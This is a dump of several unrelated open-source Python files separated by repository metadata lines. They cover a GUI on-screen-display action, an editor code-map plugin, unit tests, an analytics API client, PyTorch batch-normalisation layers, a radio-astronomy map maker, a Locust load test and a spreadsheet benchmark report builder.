event = CreateEvent(None, 0, 0, None)
wx.CallAfter(
self.osdFrame.ShowOSD,
osdText,
fontInfo,
foregroundColour,
backgroundColour,
alignment,
offset,
displayNumber,
timeout,
event,
skin
)
eg.actionThread.WaitOnEvent(event)
def Configure(
self,
osdText="",
fontInfo=None,
foregroundColour=(255, 255, 255),
backgroundColour=(0, 0, 0),
alignment=0,
offset=(0, 0),
displayNumber=0,
timeout=3.0,
skin=None,
):
if isinstance(skin, bool):
skin = SKINS[0] if skin else None
if fontInfo is None:
fontInfo = DEFAULT_FONT_INFO
panel = eg.ConfigPanel()
text = self.text
editTextCtrl = panel.TextCtrl("\n\n", style=wx.TE_MULTILINE)
height = editTextCtrl.GetBestSize()[1]
editTextCtrl.ChangeValue(osdText)
editTextCtrl.SetMinSize((-1, height))
alignmentChoice = panel.Choice(
alignment, choices=text.alignmentChoices
)
displayChoice = eg.DisplayChoice(panel, displayNumber)
xOffsetCtrl = panel.SpinIntCtrl(offset[0], -32000, 32000)
yOffsetCtrl = panel.SpinIntCtrl(offset[1], -32000, 32000)
timeCtrl = panel.SpinNumCtrl(timeout)
fontButton = panel.FontSelectButton(fontInfo)
foregroundColourButton = panel.ColourSelectButton(foregroundColour)
if backgroundColour is None:
tmpColour = (0, 0, 0)
else:
tmpColour = backgroundColour
outlineCheckBox = panel.CheckBox(
backgroundColour is not None, text.outlineFont
)
backgroundColourButton = panel.ColourSelectButton(tmpColour)
backgroundColourButton.Enable(backgroundColour is not None)
useSkin = skin is not None
skinCtrl = panel.CheckBox(useSkin, text.skin)
skinCtrl.SetValue(useSkin)
skinChc = panel.Choice(SKINS.index(skin) if skin else 0, SKINS)
skinChc.Enable(useSkin)
sizer = wx.GridBagSizer(5, 5)
expand = wx.EXPAND
align = wx.ALIGN_CENTER_VERTICAL
sizer.AddMany([
(panel.StaticText(text.editText), (0, 0), (1, 1), align),
(editTextCtrl, (0, 1), (1, 4), expand),
(panel.StaticText(text.osdFont), (1, 3), (1, 1), align),
(fontButton, (1, 4)),
(panel.StaticText(text.osdColour), (2, 3), (1, 1), align),
(foregroundColourButton, (2, 4)),
(outlineCheckBox, (3, 3), (1, 1), expand),
(backgroundColourButton, (3, 4)),
(skinCtrl, (4, 3)),
(skinChc, (4, 4), (1, 1), expand),
(panel.StaticText(text.alignment), (1, 0), (1, 1), align),
(alignmentChoice, (1, 1), (1, 1), expand),
(panel.StaticText(text.display), (2, 0), (1, 1), align),
(displayChoice, (2, 1), (1, 1), expand),
(panel.StaticText(text.xOffset), (3, 0), (1, 1), align),
(xOffsetCtrl, (3, 1), (1, 1), expand),
(panel.StaticText(text.yOffset), (4, 0), (1, 1), align),
(yOffsetCtrl, (4, 1), (1, 1), expand),
(panel.StaticText(text.wait1), (5, 0), (1, 1), align),
(timeCtrl, (5, 1), (1, 1), expand),
(panel.StaticText(text.wait2), (5, 2), (1, 3), align),
])
sizer.AddGrowableCol(2)
panel.sizer.Add(sizer, 1, wx.EXPAND)
def OnCheckBoxBGColour(event):
backgroundColourButton.Enable(outlineCheckBox.IsChecked())
event.Skip()
outlineCheckBox.Bind(wx.EVT_CHECKBOX, OnCheckBoxBGColour)
def OnCheckBoxSkin(event):
skinChc.Enable(skinCtrl.IsChecked())
event.Skip()
skinCtrl.Bind(wx.EVT_CHECKBOX, OnCheckBoxSkin)
while panel.Affirmed():
if outlineCheckBox.IsChecked():
outlineColour = backgroundColourButton.GetValue()
else:
outlineColour = None
if skinCtrl.IsChecked():
skin = skinChc.GetStringSelection()
else:
skin = None
panel.SetResult(
editTextCtrl.GetValue(),
fontButton.GetValue(),
foregroundColourButton.GetValue(),
outlineColour,
alignmentChoice.GetValue(),
(xOffsetCtrl.GetValue(), yOffsetCtrl.GetValue()),
displayChoice.GetValue(),
timeCtrl.GetValue(),
skin
)
def GetLabel(self, osdText, *dummyArgs):
return self.text.label % osdText.replace("\n", r"\n")
@classmethod
def OnAddAction(cls):
def MakeOSD():
cls.osdFrame = OSDFrame(None)
def CloseOSD():
cls.osdFrame.timer.cancel()
cls.osdFrame.Close()
eg.app.onExitFuncs.append(CloseOSD)
wx.CallAfter(MakeOSD)
@eg.LogIt
def OnClose(self):
# self.osdFrame.timer.cancel()
# wx.CallAfter(self.osdFrame.Close)
self.osdFrame = None
class OSDFrame(wx.Frame):
"""
A shaped frame to display the OSD.
"""
@eg.LogIt
def __init__(self, parent):
|
oleg-shilo/sublime-codemap | custom_mappers/ts.py | Python | mit | 5,302 | 0.004715 | # Custom mapper sample for CodeMap plugin
# This script defines a mandatory `def generate(file)` and module attribute map_syntax:
# - `def generate(file)`
# The routine analyses the file content and produces the 'code map' representing the content structure.
# In this case it builds the list of sections (lines that start with `#` character) in the py file.
#
# - `map_syntax`
# Optional attribute that defines syntax highlight to be used for the code map text
#
# The map format: <item title>:<item position in source code>
#
# You may need to restart Sublime Text to reload the mapper
import codecs
import sublime
try:
installed = sublime.load_settings('Package Control.sublime-settings').get('installed_packages')
except:
installed = []
# `map_syntax` is a syntax highlighting that will be applied to CodeMap at runtime
# you can set it to the custom or built-in language definitions
if 'TypeScript' in installed:
map_syntax = 'Packages/TypeScript/TypeScript.tmLanguage'
else:
# fallback as TypeScript is not installed
map_syntax = 'Packages/Python/Python.tmLanguage'
def generate(file):
return ts_mapper.generate(file)
class ts_mapper():
# -----------------
def generate(file):
def str_of(count, char):
text = ''
for i in range(count):
text = text + char
return text
# Pasrse
item_max_length = 0
members = []
try:
with codecs.open(file, "r", encoding='utf8') as f:
lines = f.read().split('\n')
line_num = 0
last_type = ''
last_indent = 0
for line in lines:
line = line.replace('\t', ' ')
line_num = line_num + 1
code_line = line.lstrip()
info = None
indent_level = len(line) - len(code_line);
def parse_as_class(keyword, line):
if code_line.startswith(keyword+' ') or code_line.startswith('export '+keyword+' ') :
last_type = keyword
last_indent = indent_level
if code_line.startswith('export '+keyword+' '):
line = line.replace('export '+keyword+' ', keyword+' ')
display_line = line.rpartition('implements')[0]
if not display_line:
display_line = line.rpartition('{')[0]
if not display_line:
display_line = line.rstrip()
# class CSScriptHoverProvider implements HoverProvider {
info = (line_num,
keyword,
display_line.split('(')[0].split(':')[0].rstrip()+' {}', # suffix brackets make it valid TS syntax
indent_level)
return info
# miss C# here :)
# info = parse_as_class('class', line) ??
# parse_as_class('interface', line) ??
# parse_as_class('whatever', line)
info = parse_as_class('class', line)
if not info:
info = parse_as_class('interface', line)
if info:
pass
elif code_line.startswith('function ') or code_line.startswith('export function ') :
if last_type == 'function' and indent_level > last_indent:
continue # private class functions
last_type = 'function'
last_indent = indent_level
info = (line_num,
'function',
line.split('(')[0].rstrip()+'()',
indent_level)
elif code_line.startswith('public '):
last_type = 'public '
last_indent = indent_level
info = (line_num,
'public ',
line.replace('public ', '').split('(')[0].rstrip()+'()',
indent_level)
if info:
length = len(info[2])
if item_max_length < length:
item_max_length = length
members.append(info)
except Exception as err:
print ('CodeMap-py:', err)
members.clear()
# format
map = ''
last_indent = 0
last_type = ''
for line, content_type, content, indent in members:
extra_line = ''
if indent == last_indent:
| if content_type != last_type:
extra_line = '\n'
elif content_type == 'class' or content_type == 'interface':
extra_line = '\n'
preffix = str_of(indent, ' ')
lean_content = content[in | dent:]
suffix = str_of(item_max_length-len(content), ' ')
map = map + extra_line + preffix + lean_content + suffix +' :'+str(line) +'\n'
last_indent = indent
last_type = content_type
# print(map)
return map |
arielalmendral/ert | python/tests/core/util/test_hash.py | Python | gpl-3.0 | 1,507 | 0 | from ctypes import c_void_p
from ert.test import ExtendedTestCase
from ert.util import Hash, StringHash, DoubleHash, IntegerHash
class HashTest(ExtendedTestCase):
def test_string_hash(self):
hash = StringHash()
self.assertEqual(len(hash), 0)
hash["hipp"] = ""
self.assertEqual(len(hash), 1)
with self.assertRaises(ValueError):
hash["hopp"] = 55
| with self.assertRaises(KeyError):
hopp = hash["hopp"]
self.assertTrue("hipp" in hash)
self.assertEqual(list(hash.keys()), ["hipp"])
def test_int_hash(self):
hash = IntegerHash()
with self.assertRaises(ValueError):
hash["one"] = "ein"
with self.assertRaises(ValueError):
hash["one"] = 1.0
hash | ["two"] = 2
self.assertEqual(hash["two"], 2)
def test_double_hash(self):
hash = DoubleHash()
with self.assertRaises(ValueError):
hash["one"] = "ein"
hash["two"] = 2
hash["three"] = 3.0
self.assertEqual(hash["two"], 2)
self.assertEqual(hash["three"], 3.0)
def test_c_void_p_hash(self):
hash = Hash()
cp = c_void_p(512)
hash["1"] = cp
self.assertEqual(hash["1"], cp.value)
def test_for_in_hash(self):
hash = StringHash()
hash["one"] = "one"
hash["two"] = "two"
hash["three"] = "three"
for key in hash:
self.assertTrue(key in hash)
|
linkleonard/lib-python | outbound/__init__.py | Python | mit | 12,217 | 0.003765 | import sys
import json
from numbers import Number
import time
import requests
import version
__BASE_URL = "https://api.outbound.io/v2"
this = sys.modules[__name__]
ERROR_INIT = 1
ERROR_USER_ID = 2
ERROR_EVENT_NAME = 3
ERROR_CONNECTION = 4
ERROR_UNKNOWN = 5
ERROR_TOKEN = 6
APNS = "apns"
GCM = "gcm"
def init(key):
setattr(this, '__HEADERS', {
'content-type': 'application/json',
'X-Outbound-Client': 'Python/{0}'.format(version.VERSION),
'X-Outbound-Key': key,})
def disable_token(platform, user_id, token, on_error=None, on_success=None):
""" Disable a device token for a user.
:param str platform The platform which to disable token on. One of either
Google Cloud Messaging (outbound.GCM) or Apple Push Notification Service
(outbound.APNS).
:param str | number user_id: the id you use to identify a user. this should
be static for the lifetime of a user.
:param str token: the token to disable.
:param func on_error: An optional function to call in the event of an error.
on_error callback should take 2 parameters: `code` and `error`. `code` will be
one of outbound.ERROR_XXXXXX. `error` will be the corresponding message.
:param func on_success: An optional function to call if/when the API call succeeds.
on_success callback takes no parameters.
"""
__device_token(platform, False, user_id, token, on_error, on_success)
def register_token(platform, user_id, token, on_error=None, on_success=None):
""" Register a device token for a user.
:param str platform The platform which to register token on. One of either
Google Cloud Messaging (outbound.GCM) or Apple Push Notification Service
(outbound.APNS).
:param str | number user_id: the id you use to identify a user. this should
be static for the lifetime of a user.
:param str token: the token to register.
:param func on_error: An optional function to call in the event of an error.
on_error callback should take 2 parameters: `code` and `error`. `code` will be
one of outbound.ERROR_XXXXXX. `error` will be the corresponding message.
:param func on_success: An optional function to call if/when the API call succeeds.
on_success callback takes no parameters.
"""
__device_token(platform, True, user_id, token, on_error, on_success)
def identify(user_id, previous_id=None, group_id=None, group_attributes=None,
first_name=None, last_name=None, email=None,
phone_number=None, apns_tokens=None, gcm_tokens=None,
attributes=None, on_error=None, on_success=None):
""" Identifying a user creates a record of your user in Outbound. Identify
calls should be made prior to sending any track events for a user.
:param str | number user_id: the id you use to identify a user. this should
be static for the lifetime of a user.
:param str | number previous_id: OPTIONAL the id you previously used to identify the user.
:param str | number group_id: OPTIONAL the id that identifies a group of users the current user
belongs to.
:param dict group_attributes: OPTIONAL An optional dictionary of attributes that are shared
among the group this user belongs to.
:param str first_name: OPTIONAL the user's first name.
:param str last_name: OPTIONAL the user's last name.
:param str email: OPTIONAL the user's email address.
:param str phone_number: OPTIONAL the user's phone number.
:param str | list apns_tokens: OPTIONAL the device tokens for the user's iOS
devices. If a single string is given it is put into a list.
:param str | list gcm_tokens: OPTIONAL the device tokens for the user's Android
devices. If a single string is given it is put into a list.
:param dict attributes: An optional dictionary with any additional freeform
attributes describing the user.
:param func on_error: An optional function to call in the event of an error.
on_error callback should take 2 parameters: `code` and `error`. `code` will be
one of outbound.ERROR_XXXXXX. `error` will be the corresponding message.
:param func on_success: An optional function to call if/when the API call succeeds.
on_success callback takes no parameters.
"""
on_error = on_error or __on_error
on_success = on_success or __on_success
if not hasattr(this, '__HEADERS'):
on_error(ERROR_INIT, __error_message(ERROR_INIT))
return
if not isinstance(user_id, (basestring, Number)):
on_error(ERROR_USER_ID, __error_message(ERROR_USER_ID))
return
data = __user(
first_name,
last_name,
email,
phone_number,
apns_tokens,
gcm_tokens,
attributes,
previous_id,
group_id,
group_attributes,)
data['user_id'] = user_id
try:
resp = requests.post(
"%s/identify" % __BASE_URL,
data=json.dumps(data),
headers=getattr(this, '__HEADERS'),)
if resp.status_code >= 200 and resp.status_code < 400:
on_success()
else:
on_error(ERROR_UNKNOWN, resp.text)
except requests.exceptions.ConnectionError:
on_error(ERROR_CONNECTION, __error_message(ERROR_CONNECTION))
def track(user_id, event, first_name=None, last_name=None, email=None,
phone_number=None, apns_tokens=None, gcm_tokens=None,
user_attributes=None, properties=None, on_error=None, on_success=None, timestamp=None):
""" For any event you want to track, when a user triggers that event you
would call this function.
You can do an identify and track call simultaneously by including all the
identifiable user information in the track call.
:param str | number user_id: the id you user who triggered the event.
:param str first_name: OPTIONAL the user's first name.
:param str last_name: OPTIONAL the user's last name.
:param str email: OPTIONAL the user's email address.
:param str phone_number: OPTIONAL the user's phone number.
:param str | list apns_tokens: OPTIONAL the device tokens for the user's iOS
devices. If a single string is given it is put into a list.
:param str | list gcm_tokens: OPTIONAL the device tokens for the user's Android
devices. If a single string is given it is put into a list.
:param dict user_attributes: An optional dictionary with any additional
freeform attributes describing the user.
:param dict properties: An optional dictionary with any properties that
describe the event being track. Example: if the event were "added item to
cart", you might include a properties named "item" that is the name
of the item added to the cart.
:param func on_error: An optional function to call in the event of an error.
on_error callback should take 1 parameter which will be the error messa | ge.
:param func on_success: An optional function to call if/when the API call succeeds.
on_success callback takes no parameters.
"""
on_error = on_error or __on_error
on_success = on_success or __on_success
if not hasattr(this, '__HEADERS'):
on_error(ERROR_INIT, __error_mess | age(ERROR_INIT))
return
if not isinstance(user_id, (basestring, Number)):
on_error(ERROR_USER_ID, __error_message(ERROR_USER_ID))
return
if not isinstance(event, basestring):
on_error(ERROR_EVENT_NAME, __error_message(ERROR_EVENT_NAME))
return
data = dict(user_id=user_id, event=event)
user = __user(
first_name,
last_name,
email,
phone_number,
apns_tokens,
gcm_tokens,
user_attributes,
None, None, None)
if user:
data['user'] = user
if properties:
if isinstance(properties, dict):
if len(properties) > 0:
data['properties'] = properties
else:
sys.stderr.write('Invalid event properties given. Expected dictionary. ' +
'Got %s' % type(properties).__name__)
if timestamp:
data['timestamp'] = timestamp
else:
data['tim |
RPGOne/Skynet | pytorch-master/torch/nn/modules/batchnorm.py | Python | bsd-3-clause | 6,848 | 0.00219 | import torch
from .module import Module
from torch.nn.parameter import Parameter
from .. import functional as F
# TODO: check contiguous in THNN
# TODO: use separate backend functions?
class _BatchNorm(Module):
def __init__(self, num_features, eps=1e-5, momentum=0.1, affine=True):
super(_BatchNorm, self).__init__()
self.num_features = num_features
self.affine = affine
self.eps = eps
self.momentum = momentum
if self.affine:
self.weight = Parameter(torch.Tensor(num_features))
self.bias = Parameter(torch.Tensor(num_features))
else:
self.register_parameter('weight', None)
self.register_parameter('bias', None)
self.register_buffer('running_mean', torch.zeros(num_features))
self.register_buffer('running_var', torch.ones(num_features))
self.reset_parameters()
def reset_parameters(self):
self.running_mean.zero_()
self.running_var.fill_(1)
if self.affine:
self.weight.data.uniform_()
self.bias.data.zero_()
def _check_input_dim(self, input):
if input.size(1) != self.running_mean.nelement():
raise ValueError('got {}-feature tensor, expected {}'
.format(input.size(1), self.num_features))
def forward(self, input):
self._check_input_dim(input)
return F.batch_norm(
input, self.running_mean, self.running_var, self.weight, self.bias,
self.training, self.momentum, self.eps)
def __repr__(self):
return ('{name}({num_features}, eps={eps}, momentum={momentum},'
' affine={affine})'
.format(name=self.__class__.__name__, **self.__dict__))
class BatchNorm1d(_BatchNorm):
r"""Applies Batch Normalization over a 2d or 3d input that is seen as a mini-batch.
.. math::
y = \frac{x - mean[x]}{ \sqrt{Var[x]} + \epsilon} * gamma + beta
The mean and standard-deviation are calculated per-dimension over
the mini-batches and gamma and beta are learnable parameter vectors
of size N (where N is the input size).
During training, this layer keeps a running estimate of its computed mean
and variance. The running sum is kept with a default momentum of 0.1.
During evaluation, this running mean/variance is used for normalization.
Args:
num_features: num_features from an expected input of size `batch_size x num_features [x width]`
eps: a value added to the denominator for numerical stability. Default: 1e-5
momentum: the value used for the running_mean and running_var computation. Default: 0.1
affine: a boolean value that when set to true, gives the layer learnable affine parameters.
Shape:
- Input: :math:`(N, C)` or :math:`(N, C, L)`
- Output: :math:`(N, C)` or :math:`(N, C, L)` (same shape as input)
Examples:
>>> # With Learnable Parameters
>>> m = nn.BatchNorm1d(100)
>>> # Without Learnable Parameters
>>> m = nn.BatchNor | m1d(100, affine=False)
>>> | input = autograd.Variable(torch.randn(20, 100))
>>> output = m(input)
"""
def _check_input_dim(self, input):
if input.dim() != 2 and input.dim() != 3:
raise ValueError('expected 2D or 3D input (got {}D input)'
.format(input.dim()))
super(BatchNorm1d, self)._check_input_dim(input)
class BatchNorm2d(_BatchNorm):
r"""Applies Batch Normalization over a 4d input that is seen as a mini-batch of 3d inputs
.. math::
y = \frac{x - mean[x]}{ \sqrt{Var[x]} + \epsilon} * gamma + beta
The mean and standard-deviation are calculated per-dimension over
the mini-batches and gamma and beta are learnable parameter vectors
of size N (where N is the input size).
During training, this layer keeps a running estimate of its computed mean
and variance. The running sum is kept with a default momentum of 0.1.
During evaluation, this running mean/variance is used for normalization.
Args:
num_features: num_features from an expected input of size batch_size x num_features x height x width
eps: a value added to the denominator for numerical stability. Default: 1e-5
momentum: the value used for the running_mean and running_var computation. Default: 0.1
affine: a boolean value that when set to true, gives the layer learnable affine parameters.
Shape:
- Input: :math:`(N, C, H, W)`
- Output: :math:`(N, C, H, W)` (same shape as input)
Examples:
>>> # With Learnable Parameters
>>> m = nn.BatchNorm2d(100)
>>> # Without Learnable Parameters
>>> m = nn.BatchNorm2d(100, affine=False)
>>> input = autograd.Variable(torch.randn(20, 100, 35, 45))
>>> output = m(input)
"""
def _check_input_dim(self, input):
if input.dim() != 4:
raise ValueError('expected 4D input (got {}D input)'
.format(input.dim()))
super(BatchNorm2d, self)._check_input_dim(input)
class BatchNorm3d(_BatchNorm):
r"""Applies Batch Normalization over a 5d input that is seen as a mini-batch of 4d inputs
.. math::
y = \frac{x - mean[x]}{ \sqrt{Var[x]} + \epsilon} * gamma + beta
The mean and standard-deviation are calculated per-dimension over
the mini-batches and gamma and beta are learnable parameter vectors
of size N (where N is the input size).
During training, this layer keeps a running estimate of its computed mean
and variance. The running sum is kept with a default momentum of 0.1.
During evaluation, this running mean/variance is used for normalization.
Args:
num_features: num_features from an expected input of size batch_size x num_features x height x width
eps: a value added to the denominator for numerical stability. Default: 1e-5
momentum: the value used for the running_mean and running_var computation. Default: 0.1
affine: a boolean value that when set to true, gives the layer learnable affine parameters.
Shape:
- Input: :math:`(N, C, D, H, W)`
- Output: :math:`(N, C, D, H, W)` (same shape as input)
Examples:
>>> # With Learnable Parameters
>>> m = nn.BatchNorm3d(100)
>>> # Without Learnable Parameters
>>> m = nn.BatchNorm3d(100, affine=False)
>>> input = autograd.Variable(torch.randn(20, 100, 35, 45, 10))
>>> output = m(input)
"""
def _check_input_dim(self, input):
if input.dim() != 5:
raise ValueError('expected 5D input (got {}D input)'
.format(input.dim()))
super(BatchNorm3d, self)._check_input_dim(input)
|
emgirardin/compassion-modules | message_center_compassion/mappings/__init__.py | Python | agpl-3.0 | 467 | 0 | # -*- encoding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2015 Compassion CH (http://www.compassion.ch)
# Releasing children from poverty in Jesus' name
# @author: Emanuel Cino <ecino@compassion.ch>
#
# The licence is i | n the file __openerp__.py
#
############################################################## | ################
from . import base_mapping
from . import advanced_query_mapping
|
ewanbarr/UtmostFanbeamMapper | map_maker.py | Python | apache-2.0 | 4,128 | 0.018411 | from astropy.io import fits
from astropy.wcs import WCS
import numpy as np
class RADecMap(object):
def __init__(self,extent,nra,ndec):
"""
Container for equatorial maps.
extent: extent of map [ra0,ra1,dec0,dec1]
nra: sampling in ra
ndec: sampling in dec
"""
ra0,ra1,dec0,dec1 = extent
min_ra = min(ra0,ra1)
max_ra = max(ra0,ra1)
min_dec = min(dec0,dec1)
max_dec = max(dec0,dec1)
self.ras = np.linspace(max_ra,min_ra,nra)
self.decs = np.linspace(max_dec,min_dec,ndec)
self.delta_ra = self.ras[1] - self.ras[0]
self.delta_dec = self.decs[0] - self.decs[1]
self.map = np.zeros([ndec,nra],dtype='float32')
def to_fits(self,fname):
"""
Write map to fits file (hopefully in right order)
fname: name of output file
"""
deg = np.degrees
wcs = WCS(naxis=2)
wcs.wcs.crpix = [self.map.shape[1]/2, self.map.shape[0]/2]
wcs.wcs.cdelt = np.array([deg(self.delta_ra), deg(self.delta_dec)])
wcs.wcs.crval = [deg(self.ras[self.map.shape[1]/2]), deg(self.decs[self.map.shape[0]/2])]
wcs.wcs.ctype = ["RA---TAN", "DEC--TAN"]
header = wcs.to_header()
hdu = fits.PrimaryHDU(self.map)
hdu.header.update(header)
hdu.writeto(fname,clobber=True)
def max_pixel(self):
"""
Return location and coordinate of max pixel.
"""
max_dec_idx = self.map.max(axis=1).argmax()
max_ra_idx = self.map.max(axis=0).argmax()
return (max_ra_idx,max_dec_idx),(self.ras[max_ra_idx],self.decs[max_dec_idx])
def gaussian(x,mu,sig):
"""
Get the height of a normalised Gaussian
x: x-axis coordinate
mu: mean
sig: standard deviation
"""
return np.e**(-((x-mu)**2)/(2*sig**2))
def default_beam_model(ns_offsets):
"""
Return pixel weight based on offset from beam c | ent | re in NS axis.
ns_offsets: scalar or array of offsets
"""
fwhm = np.radians(2.0)
sigma = fwhm/2.355
return 1/gaussian(ns_offsets,0.0,sigma)
def fanbeam_model(ns_offsets,ew_offsets):
ns_fwhm = np.radians(2.0)
ns_sigma = ns_fwhm/2.355
ew_fwhm = np.radians(41/3600.0)
ew_sigma = ew_fwhm/2.355
return 1/(gaussian(ns_offsets,0.0,ns_sigma)*gaussian(ew_offsets,0.0,ew_sigma))
def make_map(fanbeams,
extent,
nra,
ndec,
beam_model=default_beam_model,
op=np.median,
cache = True
):
""" Make an equatorial map from a set of fanbeams.
fanbeams: An object of basetype FanBeamTimeMap
extent: the shape of the map [min RA, max RA, min Dec, max Dec]
nra: the sampling in RA
ndec: the sampling in Dec
beam_model: a function that takes an array of NS offsets and returns an array of weights
op: an operation to apply to the array of values extracted from the fanbeams
"""
#create output map
output = RADecMap(extent,nra,ndec)
#get all tracks and offsets
if cache:
tracks,offsets = fanbeams.radecs_to_tracks(output.ras,output.decs)
#loop over ra and dec values to populate map
for ii,ra in enumerate(output.ras):
print ii,"/",output.ras.size,"\r",
for jj,dec in enumerate(output.decs):
#extract a trail through fanbeam space
if cache:
trail,xcoords = fanbeams.extract(tracks[jj,ii],fanbeams._xcoords)
ns_offsets = offsets[jj,ii][xcoords]
else:
track,ns_offsets = fanbeams.radec_to_track(ra,dec)
trail,xcoords = fanbeams.extract(track,fanbeams._xcoords)
ns_offsets = ns_offsets[xcoords]
#inline background subtraction would happen here
if beam_model is not None:
#apply a weighting to the trail
trail *= beam_model(ns_offsets)
#apply op to the trail
output.map[jj,ii] = op(trail)
print
return output
|
dragoon/kilogram | kilogram/dataset/edit_histories/wikipedia/__init__.py | Python | apache-2.0 | 427 | 0 | import re
END_SENTENCE | _RE = re.compile(r'\s[.?!]\s(?=[^a-z])')
def line_filter(line):
sentences = END_SENTENCE_RE.split(line)
last = len(sentences) - 1
for i, sentence in enumerate(sentences):
if not sentence.strip():
continue
if i == last and not sentence.endswith('.'):
continue
if not sentence.endswith('.'):
| sentence += ' .'
yield sentence
|
GoogleCloudPlatform/cloud-opensource-python | compatibility_server/loadtest/locustfile.py | Python | apache-2.0 | 2,473 | 0 | # Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Perform a load test on the compatibility server. Usage:
$ pip install locustio
$ locust --host=http://104.197.8.72
"""
import random
import urllib.parse
import locust
PYTHON2_PACKAGES = [
'apache-beam[gcp]',
'google-cloud-bigtable',
'google-cloud-dns',
'google-cloud-vision',
'tensorboard',
'tensorflow',
]
PYTHON3_PACKAGES = [
'google-cloud-bigtable',
'google-cloud-dns',
'google-cloud-vision',
'tensorboard',
'tensorflow',
]
class CompatibilityCheck(locust.TaskSet):
@locust.task
def single_python2(self):
| query = urllib.parse.urlencode(
{'python-version': '2',
'package': random.choice(PYTHON2_PACKAGES)})
self.client.get('/?%s' % query)
@locust.task
def single_python3(self):
query = urllib.parse.urlencode(
{'python-version': '3',
'package': random.choice(PYTHON3_PACKAGES)})
self.client.get('/?%s' % query)
@locust.task
def d | ouble_python2(self):
package1 = random.choice(PYTHON2_PACKAGES)
package2 = random.choice(list(set(PYTHON2_PACKAGES) - {package1}))
query = urllib.parse.urlencode([('python-version', '2'),
('package', package1),
('package', package2)])
self.client.get('/?%s' % query)
@locust.task
def double_python3(self):
package1 = random.choice(PYTHON3_PACKAGES)
package2 = random.choice(list(set(PYTHON3_PACKAGES) - {package1}))
query = urllib.parse.urlencode([('python-version', '3'),
('package', package1),
('package', package2)])
self.client.get('/?%s' % query)
class CompatibilityChecker(locust.HttpLocust):
task_set = CompatibilityCheck
min_wait = 0
max_wait = 0
|
d1m0/browser_bench | build_worksheet.py | Python | mit | 4,846 | 0.026826 | #! /usr/bin/env python
import gspread
import argparse
from format import *
import sys
from stats import getMean
import pdb
import json
from oauth2client.client import SignedJwtAssertionCredentials
from gsheets import openSS, Table, putRawTable
p = argparse.ArgumentParser(description=\
"Given a set of runs for several browsers build a GoogleDocs spread sheet comparing the results")
p.add_argument('--key', type=str, help='Path to JSON key for Google Dev Project')
p.add_argument('--title', type=str, help='Title of an existing empty spreadsheet in which to work')
p.add_argument('results_file', type=str, help='File with raw results')
p.add_argument('--baseline', type=str, help='Label for the browser which should be considered baseline', required=False)
p.add_argument('--sheet', type=str, help='Worksheet name where we to put results', default='Sheet1', required=False)
args = p.parse_args()
baseline = args.baseline if 'baseline' in args else None
ss = openSS(args.key, args.title)
ws = ss.worksheet(args.sheet);
r = load(args.results_file)
# Put general info about the test at the top
putRawTable(ws, 1, 1, [ [ 'CPU:', cpuInfoStr(r)], \
['Arch:', arch(r)], \
['Ram:', str(ram(r)) + 'MB'],\
['OS:', os(r)], \
['Date:', time(r)] ])
def isRectangular(tbl):
return len(set([len(x) for x in tbl])) == 1
def meansCol(col):
bench = col_benchmark(col)
return [getMean(x, bench) for x in col_scores(col)]
def transpose(m):
t = [[None for i in xrange(0, len(m))] for j in xrange(0, len(m[0]))]
for i in xrange(0, len(m)):
for j in xrange(0, len(m[i])):
t[j][i] = m[i][j]
return t
def buildResultsTable(ws, startRow, startCol, r):
nruns = len(col_scores(cols(r)[0]))
resCols = [[col_label(x), col_benchmark(x)] + meansCol(x) for x in cols(r)]
def cname(col): return str(col[1]) + ',' + str(col[0])
# Furthermore we impose an ordering for neatness, and remember where vanilla values are
def sortF(c1, c2):
bench1 = col_benchmark(c1)
bench2 = col_benchmark(c2)
if (bench1 == bench2):
lbl1 = col_label(c1)
lbl2 = col_label(c2)
if (lbl1 == lbl2):
return 0
elif lbl1 == 'vanilla':
return -1
elif lbl2 == 'vanilla':
return 1
else: return cmp(lbl1, lbl2)
else:
return cmp(bench1, bench2)
resCols.sort(cmp=sortF)
if (baseline):
rowNames = range(1, 1 + nruns) + [ 'Mean' ,'Std. Dev.', 'Std. Dev. (%)', 'Mean Overhead (%)', 'Overhead Std. Dev. (%)' ]
else:
rowNames = range(1, 1 + nruns) + [ 'Mean' ,'Std. Dev.', 'Std. Dev. (%)' ]
colNames = [cname(c) for c in resCols]
resTbl = Table(startRow, startCol, rowNames, colNames, ws)
meanRow = ['=average({0}:{1})'.format(resTbl.cellLbl(1, colNames[i]), resTbl.cellLbl(nruns, colNames[i])) for i in xrange(0, len(colNames))]
stdevRow = ['=stdev({0}:{1})'.format(resTbl.cellLbl(1, colNames[i]), resTbl.cellLbl(nruns, colNames[i])) for i in xrange(0, len(colNames))]
stdevRowPer = ['={0} * 100.0 / {1}'.format(\
resTbl.cellLbl('Std. Dev.', colNames[i]),
resTbl.cellLbl('Mean', colNames[i]))
for i in xrange(0, le | n(colNames))]
if (baseline):
meanOverPerRow = [('=({0}-{1})*100.0/{1}' if col_benchmark(c) != 'octane' else '=({1}-{0})*100.0/{1}').format(\
resTbl.cellLbl('Mean', cname(c)), \
resTbl.cellLbl('Mean', col_ben | chmark(c) + ',' + baseline)) \
for c in resCols]
stdevOverPerRow = ['=sqrt({0}*{0}+{1}*{1})*100.0/{2}'.format(\
resTbl.cellLbl('Std. Dev.', cname(c)),
resTbl.cellLbl('Std. Dev.', col_benchmark(c) + ',' + baseline),
resTbl.cellLbl('Mean', col_benchmark(c) + ',' + baseline))
for c in resCols]
if (baseline):
contents = transpose([x[2:] for x in resCols]) + \
[ meanRow, stdevRow, stdevRowPer, meanOverPerRow, stdevOverPerRow ]
else:
contents = transpose([x[2:] for x in resCols]) + \
[ meanRow, stdevRow, stdevRowPer ]
assert isRectangular(contents)
resTbl.setContents(contents)
return resTbl
def buildSummaryTable(ws, startRow, startCol, resTbl, r):
benchmarks = list(set([col_benchmark(x) for x in cols(r)]))
browsers = list(set([col_label(x) for x in cols(r)]))
sumTbl = Table(startRow, startCol, browsers, benchmarks + [ 'Average' ], ws)
contents = [\
['=' + resTbl.cellLbl('Mean Overhead (%)', benchmark + ',' + str(browser)) \
for benchmark in benchmarks] + \
['=average({0}:{1})'.format(sumTbl.cellLbl(browser, benchmarks[0]),
